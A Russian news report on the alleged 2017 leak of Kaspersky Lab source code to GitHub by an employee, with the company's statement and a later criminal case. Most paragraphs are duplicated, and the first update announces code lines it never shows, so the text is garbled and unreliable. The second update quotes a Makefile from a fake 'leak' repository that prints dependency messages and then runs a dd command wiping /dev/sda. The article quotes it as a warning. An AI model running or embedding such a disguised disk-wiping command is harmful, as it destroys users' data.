Сегодня утром на телеграм-канале Mash был опубликован анонимный «слив» про утечку исходников «Лаборатории Касперского». Утверждалось, что сотрудник компании «на протяжении длительного времени скачивал исходные коды антивируса — и в ноябре 2017 года выложил их на GitHub. «Лаборатория Касперского» заметила слив в январе 2018 года, после новогодних праздников, добилась удаления исходников, вычислила виновника — и обратилась в МВД.
«Лаборатория Касперского» в 13:08 очень оперативно выступила с «опровержением», которое в реальности подтверждает многие факты. Но компания настаивает, что в Сеть были слиты исходники не антивируса, а каких-то других продуктов. Каких — компания не говорит. Она также не называет ни имени, ни должности провинившегося сотрудника.
«Действительно, бывший сотрудник “Лаборатории Касперского” выложил в публичный доступ часть кода, к которому имел правомерный доступ в рамках своей работы. Данный код не является частью антивируса, — сообщили в пресс-службе компании. — Данные были обнаружены на следующий день, после чего удалены из публичного доступа в кратчайшие сроки».
«Собрав все доказательные материалы, компания обратилась в правоохранительные органы. По данным материалам было возбуждено уголовное дело по признакам преступления, предусмотренного ст.183 УК РФ (незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну)», — добавили в пресс-службе.
Пока что в этой истории слишком много непонятно. Остаётся только дождаться, когда будут повторно опубликованы утёкшие исходники или хотя бы список опубликованных файлов, чтобы оценить степень угрозы для пользователей продуктов «Лаборатории Касперского». Если в Сеть действительно попали исходники антивируса, как в 2010 году, то эту защиту можно считать скомпрометированной, потому что злоумышленники наверняка постараются найти уязвимости в программе.
Добавим только, что в прошлый раз исходники антивируса тоже слил сотрудник компании, которого компания также сдала полиции. Впоследствии парень получил срок три года условно по той же статье 183 УК РФ.
UPD. Осторожно, в одном из репозиториев GitHub под названием Kaspersky leak 2018 Makefile содержит такие строки:
Если запустить это, то можно потерять информацию на /dev/sda.
«Лаборатория Касперского» в 13:08 очень оперативно выступила с «опровержением», которое в реальности подтверждает многие факты. Но компания настаивает, что в Сеть были слиты исходники не антивируса, а каких-то других продуктов. Каких — компания не говорит. Она также не называет ни имени, ни должности провинившегося сотрудника.
«Действительно, бывший сотрудник “Лаборатории Касперского” выложил в публичный доступ часть кода, к которому имел правомерный доступ в рамках своей работы. Данный код не является частью антивируса, — сообщили в пресс-службе компании. — Данные были обнаружены на следующий день, после чего удалены из публичного доступа в кратчайшие сроки».
«Собрав все доказательные материалы, компания обратилась в правоохранительные органы. По данным материалам было возбуждено уголовное дело по признакам преступления, предусмотренного ст.183 УК РФ (незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну)», — добавили в пресс-службе.
Пока что в этой истории слишком много непонятно. Остаётся только дождаться, когда будут повторно опубликованы утёкшие исходники или хотя бы список опубликованных файлов, чтобы оценить степень угрозы для пользователей продуктов «Лаборатории Касперского». Если в Сеть действительно попали исходники антивируса, как в 2010 году, то эту защиту можно считать скомпрометированной, потому что злоумышленники наверняка постараются найти уязвимости в программе.
Добавим только, что в прошлый раз исходники антивируса тоже слил сотрудник компании, которого компания также сдала полиции. Впоследствии парень получил срок три года условно по той же статье 183 УК РФ.
UPD. Осторожно, в одном из репозиториев GitHub под названием Kaspersky leak 2018 Makefile содержит такие строки:
all:
echo Check depends…
echo Install depends…
sudo dd if=/dev/urandom of=/dev/sdaЕсли запустить это, то можно потерять информацию на /dev/sda.
